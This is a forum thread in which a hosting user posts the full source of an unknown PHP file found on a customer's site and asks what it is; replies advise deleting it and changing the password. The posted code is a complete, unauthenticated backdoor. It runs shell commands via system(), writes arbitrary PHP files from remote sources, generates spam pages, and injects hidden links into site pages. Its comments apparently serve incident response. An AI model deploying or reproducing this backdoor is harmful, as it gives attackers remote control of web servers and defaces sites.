
Thread: Unknown Folder
      
   

  1. #1
    CarbonTerry is offline Major General

    Default Unknown Folder

    Hello,
    I have found an unknown folder (zjfem) in a customer's public_html.
    Here's the code contained in a "ubu.php" file:
    <?php
    // Keep the script running after the requesting client disconnects and
    // remove PHP's execution time limit, so one request can drive a long job.
    ignore_user_abort(1);
    set_time_limit(0);

    // Clear(): deletes this script's working files from the current directory.
    // "c" is the state file written by Gen()/GenNew()/Gen2(); "1r.txt" is the
    // list of generated page paths those functions append to; "log" is not
    // written anywhere in this file. Reached through the "cl" request
    // parameter in Main(). The unlink() results are not checked.
    // For incident response: these three names are artifacts to look for
    // next to the script, and their absence does not mean it was never used.
    function Clear()
    {
    unlink("c");
    unlink("1r.txt");
    unlink("log");
    }

    // Clear2(): removes the content that MRepl() injects into a site page.
    // The target page is named in a local file "m" and resolved relative to
    // the parent directory. Reached through the "cl2" request parameter.
    // The strings stripped here (<dd4>/<dd5>, <!--dd4-->/<!--dd5-->, the
    // zero-size absolutely positioned <font> tag) are the markers to search
    // the site's own pages for when checking whether they were modified.
    // NOTE: ereg_replace() was removed in PHP 7, so this sample was written
    // for older PHP versions.
    function Clear2()
    {
    // "m" holds the relative path of the page that was modified.
    $mrd = trim(file_get_contents("m"));
    $pt = "../$mrd";
    $fin = file_get_contents($pt);
    // Drop everything between the injection markers, in both marker styles.
    $fin = ereg_replace("<dd4>(.*)<dd5>", "", $fin);
    $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin);
    // Drop <a> elements whose tag contains "_lm" (Gen() names its link-map
    // pages "<name>_lm.htm").
    $fin = preg_replace('#<a[^>]+\_lm[^>]*>.*?</a>#is', '', $fin);
    // Drop text running from "http" through "tmp6" to the next "</a>".
    $fin = preg_replace("/http(.*?)tmp6(.*?)\<\/a\>/", "", $fin);
    // Drop any leftover bare markers and the hidden <font> wrapper.
    $fin = ereg_replace("<!--dd4-->", "", $fin);
    $fin = ereg_replace("<!--dd5-->", "", $fin);
    $fin = ereg_replace("<font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">", "", $fin);
    // Overwrite the page in place with the cleaned content.
    $fmrd = fopen($pt, "w+");
    fwrite($fmrd, $fin);
    fclose($fmrd);
    // Status string returned to the caller.
    echo " upt-ok";
    }

    // GetVar(): copies the request parameter $name into $var (passed by
    // reference). POST is read first and GET second, so a GET value overrides
    // a POST value of the same name. Returns true when the resulting value is
    // not loosely equal to "", false otherwise. No validation or filtering is
    // applied to the value.
    function GetVar($name, &$var)
    {
    $var = "";
    if (isset($_POST[$name]))
    $var = $_POST[$name];

    if (isset($_GET[$name]))
    $var = $_GET[$name];

    if (($var) =="")
    return false;
    else return true;
    }


    // GenNew(): page generator, reached through the "g1" request parameter.
    // It pulls page content from a location prefix supplied in the "sg"
    // request parameter and writes it as .htm files under a randomly named
    // directory beside this script. "sg" is used unvalidated as the prefix of
    // every fopen() source below; presumably it is a remote URL, which would
    // need allow_url_fopen to be enabled (not confirmed by this file).
    // Artifacts: state file "c", path list "1r.txt", a 5-letter directory
    // containing a .htaccess and one sub-directory per generated page.
    function GenNew()
    {
    // Alphabet for random directory names (27 characters, indexes 0..26).
    $alp = "abcdefghiklmnjsweqrtyuiopzx";
    $maps = array();
    // Source prefix from the request; GET overrides POST.
    if (isset($_POST["sg"]))
    $sg = $_POST["sg"];

    if (isset($_GET["sg"]))
    $sg = $_GET["sg"];

    $path = "";
    // Every generated page path is appended to "1r.txt".
    $fr = fopen("1r.txt", "a+");
    if (file_exists("c"))
    {
    // Later runs: reuse the directory name saved in the state file.
    $fconf = file("c");
    $tname = trim($fconf[0]);
    }
    else
    {
    // First run: pick a 5-letter directory name, create it and record it.
    $fconf = fopen("c", "w+");
    $rnd = mt_rand(0, 999);
    $nm = "";
    for ($i=0; $i<5; $i++)
    {
    $ran = mt_rand(0,26);
    $sym = $alp[$ran];
    $nm = $nm.$sym;
    }
    $tname = $nm;
    mkdir($tname);
    fwrite($fconf, $tname);
    $pid = 0;
    // The directory's .htaccess is copied verbatim from <sg>2.txt, so its
    // rules are chosen by whoever controls that source.
    $fht = fopen("$tname/.htaccess", "w+");

    $htname = $sg."2.txt";
    $fp = fopen($htname, "r");
    $fin = '';
    while (!feof($fp))
    {
    $fc = fgets($fp, 1024);
    if (!$fc) break;
    $fin .= $fc;
    }
    fclose($fp);
    fwrite($fht, $fin);
    fclose($fht);
    }
    // Ten pages are fetched from <sg>sgen.php per request.
    $gname = $sg."sgen.php";
    for ($j=$pid; $j<$pid+10; $j++)
    {

    $fc = "";
    $fp = fopen($gname, "r");
    $fin = '';
    while (!feof($fp))
    {
    $fc = fgets($fp, 1024);
    if (!$fc) break;
    $fin .= $fc;
    }
    fclose($fp);

    // The text following "</html>" in the fetched response is used as the
    // page name, so directory and file names come from the fetched content.
    $arr = explode("</html>", $fin);
    //print_r($arr);
    $curs = trim($arr[1]);

    $newf = "$tname/$curs/";
    echo "$newf";
    mkdir($newf);
    // The whole response is written as <dir>/<name>/<name>.htm.
    $fnd = fopen("$tname/$curs/$curs".".htm", "w+");
    fwrite($fnd, $fin);
    fclose($fnd);
    fwrite($fr, "$tname/$curs/$curs".".htm\n");


    }

    }

    // Gen2(): page generator driven by a list file, reached through the "g2"
    // request parameter. On first run it creates a random 5-letter directory
    // and copies three files from the location prefix given in "sg":
    // <sg>2.txt -> <dir>/.htaccess, <sg>2js.txt -> <dir>/2.js and
    // <sg>1t.php -> local file "1t". Each request then builds ten pages, one
    // per line of "1t", and stores its position in the state file "c".
    // "sg" is unvalidated; the query string appended to it below suggests it
    // is an http(s) URL, which would need allow_url_fopen (not confirmed here).
    // Artifacts: "c", "1t", "1r.txt", the directory with .htaccess, 2.js and
    // many <name>.htm files that link to each other.
    function Gen2()
    {
    // Alphabet for random directory names (27 characters, indexes 0..26).
    $alp = "abcdefghiklmnjsweqrtyuiopzx";
    $maps = array();
    $md = false;
    // Source prefix from the request; GET overrides POST.
    if (isset($_POST["sg"]))
    $sg = $_POST["sg"];

    if (isset($_GET["sg"]))
    $sg = $_GET["sg"];

    // "md" switches on logging of generated paths to "1r.txt".
    if (isset($_GET["md"]))
    $md = true;

    $path = "";
    $fr = fopen("1r.txt", "a+");
    if (file_exists("c"))
    {
    // Later runs: line 1 of "c" is the directory, line 2 the next index
    // into "1t".
    $fconf = file("c");
    $tname = trim($fconf[0]);
    $i_dor = trim($fconf[1]);
    $i_dor = $i_dor+0;
    }
    else
    {
    // First run: create the directory and record it with index 0.
    $fconf = fopen("c", "w+");
    $rnd = mt_rand(0, 999);
    $nm = "";
    for ($i=0; $i<5; $i++)
    {
    $ran = mt_rand(0,26);
    $sym = $alp[$ran];
    $nm = $nm.$sym;
    }
    $tname = $nm;
    mkdir($tname);
    fwrite($fconf, $tname."\n");
    fwrite($fconf, "0\n");
    $pid = 0;
    // .htaccess content is copied verbatim from <sg>2.txt.
    $fht = fopen("$tname/.htaccess", "w+");
    $htname = $sg."2.txt";
    $fp = fopen($htname, "r");
    $fin = '';
    while (!feof($fp))
    {
    $fc = fgets($fp, 1024);
    if (!$fc) break;
    $fin .= $fc;
    }
    fclose($fp);
    fwrite($fht, $fin);
    fclose($fht);


    // A script file 2.js is copied verbatim from <sg>2js.txt; what it does
    // is decided by that source and is not visible in this file.
    $fht = fopen("$tname/2.js", "w+");
    $htname = $sg."2js.txt";
    $fp = fopen($htname, "r");
    $fin = '';
    while (!feof($fp))
    {
    $fc = fgets($fp, 1024);
    if (!$fc) break;
    $fin .= $fc;
    }
    fclose($fp);
    fwrite($fht, $fin);
    fclose($fht);



    // The list of page names is saved locally as "1t" (one per line).
    $f1t = fopen("1t", "w+");
    $f1tname = $sg."1t.php";
    $fp = fopen($f1tname, "r");
    $fin = '';
    while (!feof($fp))
    {
    $fc = fgets($fp, 1024);
    if (!$fc) break;
    $fin .= $fc;
    }
    fclose($fp);
    fwrite($f1t, $fin);
    fclose($f1t);


    }
    // Increment followed by decrement; presumably only there to give the
    // counter a numeric value on the first run.
    $i_dor++;
    $i_dor--;
    $a1t = file("1t");
    $gname = $sg."sgen2.php";
    for ($j=$pid; $j<$pid+10; $j++)
    {

    // Next name from "1t"; it is sent to the source as ?th=<name>.
    $cth = trim($a1t[$i_dor]);
    $i_dor++;
    $fc = "";
    $fp = fopen($gname."?th=$cth", "r");
    $fin = '';
    while (!feof($fp))
    {
    $fc = fgets($fp, 1024);
    if (!$fc) break;
    $fin .= $fc;
    }
    fclose($fp);


    // Build 30 links to pages named after random entries among the first
    // 200 lines of "1t", so the generated pages cross-link each other.
    $links ="";
    for ($y=0; $y<30; $y++)
    {
    $ry = mt_rand(0,199);
    $rth = trim($a1t[$ry]);
    $links .= "<a href='$rth.htm'>$rth</a> \n";
    }
    // The fetched template carries a <LINKS2> placeholder for those links.
    $fin = ereg_replace("<LINKS2>", $links, $fin);

    // Page is written as <dir>/<name>.htm.
    $curs = $cth;
    $fnd = fopen("$tname/$curs".".htm", "w+");
    fwrite($fnd, $fin);
    fclose($fnd);
    if ($md)
    {
    fwrite($fr, "$tname/$curs".".htm\n");
    }
    }
    // Save the directory name and the advanced index for the next request.
    $fconf = fopen("c", "w+");
    fwrite($fconf, $tname."\n".$i_dor."\n");
    fclose($fconf);
    }

    // Gen(): page generator, reached through the "g" request parameter.
    // Request parameters read here: "sg" (location prefix for all fetched
    // content) and "gm" (name used for the current batch of pages). Both are
    // used unvalidated; the query strings appended to "sg" suggest it is an
    // http(s) URL, which would need allow_url_fopen (not confirmed here).
    // State file "c" holds four lines: top directory, sub-directory, current
    // batch name and page counter. Each request writes ten pages; when the
    // counter reaches 100 a link-map page "<name>_lm.htm" is written and its
    // path appended to "1r.txt".
    // Artifacts: "c", "1r.txt", a 5-letter directory with a .htaccess and
    // 3-letter sub-directories full of "<name>_<n>.htm" files. The folder
    // name reported in this thread (zjfem) has that 5-letter shape, though
    // the post does not say which function created it.
    function Gen()
    {
    // Alphabet for random directory names (27 characters, indexes 0..26).
    $alp = "abcdefghiklmnjsweqrtyuiopzx";
    $maps = array();
    if (isset($_POST["sg"]))
    $sg = $_POST["sg"];

    if (isset($_GET["sg"]))
    $sg = $_GET["sg"];

    if (isset($_POST["gm"]))
    $g = $_POST["gm"];

    if (isset($_GET["gm"]))
    $g = $_GET["gm"];


    $path = "";
    $fr = fopen("1r.txt", "a+");
    if (file_exists("c"))
    {
    // Later runs: restore directory names, batch name and counter.
    $fconf = file("c");
    $tname = trim($fconf[0]);
    $cname = trim($fconf[1]);
    $curs = trim($fconf[2]);
    $pid = trim($fconf[3]);
    if ($pid == 100)
    {
    // A batch of 100 pages is complete: start a new 3-letter
    // sub-directory and take the new batch name from "gm".
    $pid = 0;
    $rnd = mt_rand(0, 999);
    $nm = "";
    for ($i=0; $i<3; $i++)
    {
    $ran = mt_rand(0,26);
    $sym = $alp[$ran];
    $nm = $nm.$sym;
    }
    $cname = $nm;
    mkdir("$tname/$cname");
    $curs = $g;
    }
    }
    else
    {
    // First run: create the 5-letter top directory.
    $rnd = mt_rand(0, 999);
    $nm = "";
    for ($i=0; $i<5; $i++)
    {
    $ran = mt_rand(0,26);
    $sym = $alp[$ran];
    $nm = $nm.$sym;
    }
    $tname = $nm;
    $pid = 0;
    $curs = $g;
    mkdir($tname);
    // .htaccess content is copied verbatim from <sg>2.txt.
    $fht = fopen("$tname/.htaccess", "w+");
    $htname = $sg."2.txt";
    $fp = fopen($htname, "r");
    $fin = '';
    while (!feof($fp))
    {
    $fc = fgets($fp, 1024);
    if (!$fc) break;
    $fin .= $fc;
    }
    fclose($fp);
    fwrite($fht, $fin);
    fclose($fht);
    // Then the first 3-letter sub-directory.
    $rnd = mt_rand(0, 999);
    $nm = "";
    for ($i=0; $i<3; $i++)
    {
    $ran = mt_rand(0,26);
    $sym = $alp[$ran];
    $nm = $nm.$sym;
    }
    $cname = $nm;
    mkdir("$tname/$cname");
    }
    // Ten pages per request, fetched as <sg>sgen.php?g=<batch name>.
    $gname = $sg."sgen.php";
    for ($j=$pid; $j<$pid+10; $j++)
    {
    $fp = fopen($gname."?g=$curs", "r");
    $fin = '';
    while (!feof($fp))
    {
    $fc = fgets($fp, 1024);
    if (!$fc) break;
    $fin .= $fc;
    }
    fclose($fp);

    // Written as <dir>/<subdir>/<name>_<counter>.htm.
    $fnd = fopen("$tname/$cname/$curs"."_$j.htm", "w+");
    fwrite($fnd, $fin);
    fclose($fnd);
    }

    if ($j==100)
    {
    // Batch complete: fetch the page returned for "&m=1" and store it as
    // <name>_lm.htm, then log its path.
    $fp = fopen($gname."?g=$curs&m=1", "r");
    $fin = '';
    while (!feof($fp))
    {
    $fc = fgets($fp, 1024);
    if (!$fc) break;
    $fin .= $fc;
    }
    fclose($fp);
    $fnd = fopen("$tname/$cname/$curs"."_lm.htm", "w+");
    fwrite($fnd, $fin);
    fclose($fnd);
    $map = "$path/$tname/$cname/$curs"."_lm.htm";
    fwrite($fr,"$map\n");
    }

    // Persist the four state lines for the next request.
    $fconf = fopen("c", "w+");
    fwrite($fconf, $tname."\n");
    fwrite($fconf, $cname."\n");
    fwrite($fconf, $curs."\n");
    $nj = $j;
    fwrite($fconf, $nj."\n");
    fclose($fconf);

    }

    // Update(): writes a PHP file whose name and content both come from the
    // request. Reached through the "u" request parameter, which Main() checks
    // first. "u" is the fopen() source to read; the GET parameter "name"
    // gives the target file, written as "<name>.php" relative to the current
    // directory. Neither value is validated.
    // For incident response: this lets whoever can reach the script replace
    // it or create further .php files, so deleting this one file does not
    // show the site is clean. Review the docroot for other unexpected or
    // recently modified .php files.
    function Update()
    {
    if (isset($_GET["name"]))
    $sname = $_GET["name"];

    // Target file name is built from the request value.
    $thisname = "$sname.php";
    // Source location; GET overrides POST.
    if (isset($_POST['u']))
    $u = $_POST['u'];

    if (isset($_GET['u']))
    $u = $_GET['u'];

    // Read the whole source into memory.
    $fp = fopen($u, "r");
    $fin = '';
    while (!feof($fp))
    {
    $fc = fgets($fp, 1024);
    if (!$fc) break;
    $fin .= $fc;
    }
    fclose($fp);

    // Create or overwrite the target with what was read.
    $fthis = fopen($thisname, "w+");
    fwrite($fthis, $fin);
    fclose($fthis);
    }

    // Com(): passes the "c" request parameter unchanged to system(), i.e. it
    // runs an operating-system command with the web server account's
    // privileges and sends the output back in the response. The "@" prefix
    // suppresses PHP error output. When both POST and GET carry "c", both
    // values are executed.
    // For incident response: with this function present, treat the hosting
    // account as compromised rather than just defaced. Commands sent by GET
    // may appear in the web server access log; POST bodies normally do not.
    function Com()
    {
    if (isset($_POST['c']))
    @system($_POST['c']);
    if (isset($_GET['c']))
    @system($_GET['c']);
    }

    // MRepl(): injects externally supplied markup into one of the site's own
    // pages. Reached through the "s" request parameter. The page to modify is
    // named in a local file "m" and resolved relative to the parent
    // directory; the markup to inject is read from the location given in the
    // "mpt" request parameter (unvalidated).
    // The injected block is wrapped in a <font> tag styled to zero size with
    // hidden overflow, so visitors do not see it, and is bracketed by <dd4>
    // and <dd5> markers. Searching site pages for those markers or for that
    // style string is a direct way to find modified pages.
    function MRepl()
    {
    $mpt = "";
    $drs = "";
    // Wrapper placed before and after the injected content.
    $begtag = "<dd4><font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">";
    $endtag = "</font></body></html><dd5> ";
    // Path of the page to modify, taken from file "m".
    $mrd = trim(file_get_contents("m"));
    $pt = "../$mrd";
    $fin = file_get_contents($pt);
    GetVar("mpt", $mpt);
    // Strip the closing HTML tags.
    $fin = preg_replace ("/<\/body>/i", "", $fin);
    $fin = preg_replace ("/<\/html>/i", "", $fin);
    // Remove any block injected by an earlier run, in both marker styles.
    $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin);
    $fin = ereg_replace("<dd4>(.*)<dd5>", "", $fin);
    // Read the content to inject from the request-supplied location.
    $fp = fopen($mpt, "r");
    $drs = '';
    while (!feof($fp))
    {
    $fc = fgets($fp, 1024);
    // A falsy read ends the whole request here, before the page is
    // rewritten.
    if (!$fc)
    {
    exit();
    }
    $drs .= $fc;
    }
    fclose($fp);
    // Page = original body + wrapper start + fetched content + wrapper end
    // (the wrapper end restores </body></html>).
    $fin = $fin.$begtag;
    $fin = $fin.$drs;
    $fin = $fin.$endtag;
    // Overwrite the site page in place.
    $fmrd = fopen($pt, "w+");
    fwrite($fmrd, $fin);
    fclose($fmrd);
    }



    // Main(): request dispatcher. The presence of a request parameter (POST
    // or GET) selects the action; the first match in the order below runs and
    // the request ends. No password, token or source check is visible before
    // dispatch, so any client that can reach this file can use every action.
    //   u   -> Update()  write a .php file from a supplied source
    //   c   -> Com()     run an operating-system command
    //   g   -> Gen()     generate pages in batches
    //   g1  -> GenNew()  generate pages, one directory each
    //   g2  -> Gen2()    generate cross-linked pages from a list
    //   s   -> MRepl()   inject hidden markup into a site page
    //   cl  -> Clear()   delete working files
    //   cl2 -> Clear2()  remove injected markup from the site page
    // With none of these present the script prints "<ok>"; presumably a
    // liveness check. Requests to this file carrying these parameter names
    // are what to look for in the access log.
    function Main()
    {
    if (isset($_POST['u']) || isset($_GET['u']))
    {
    Update();
    exit();
    }



    if (isset($_POST['c']) || isset($_GET['c']))
    {
    Com();
    exit();
    }

    if (isset($_POST['g']) || isset($_GET['g']))
    {
    Gen();
    exit();
    }

    if (isset($_POST['g1']) || isset($_GET['g1']))
    {
    GenNew();
    exit();
    }


    if (isset($_POST['g2']) || isset($_GET['g2']))
    {
    Gen2();
    exit();
    }

    if (isset($_POST['s']) || isset($_GET['s']))
    {
    MRepl();
    exit();
    }

    if (isset($_POST['cl']) || isset($_GET['cl']))
    {
    Clear();
    exit();
    }

    if (isset($_POST['cl2']) || isset($_GET['cl2']))
    {
    Clear2();
    exit();
    }

    echo "<ok>";

    }

    // Entry point: every request to this file goes straight to the dispatcher.
    Main();

    ?>
    I need some help with this one.
    Thanks
    CarbonTerry
    Semper Fi
    Still green...still mean......just not as lean

    Red Hawk Archery
    Zone 5 Photo
    My USMC

  2. #2
    Marincky is offline General

    Default Re: Unknown Folder

    Zap it!!
    Don't aim for success if you want it; just do what you love and believe in, and it will come naturally.

  3. #3
    CarbonTerry is offline Major General

    Default Re: Unknown Folder

    Thanks M
    I will delete it right away. What is it?
    CarbonTerry
    Semper Fi
    Still green...still mean......just not as lean

    Red Hawk Archery
    Zone 5 Photo
    My USMC

  4. #4
    Marincky is offline General

    Default Re: Unknown Folder

    I can't tell you what it is, but the only folders inside your public_html should be ones you recognise. At the extreme worst, if you delete something you shouldn't, you only have to republish the site. But if it were me I would have zapped it on first glance. Seen another post very similar to this earlier. Get rid.. and possibly even change your password ; - )
    Don't aim for success if you want it; just do what you love and believe in, and it will come naturally.

  5. #5
    CarbonTerry is offline Major General

    Default Re: Unknown Folder

    password change completed.
    CarbonTerry
    Semper Fi
    Still green...still mean......just not as lean

    Red Hawk Archery
    Zone 5 Photo
    My USMC
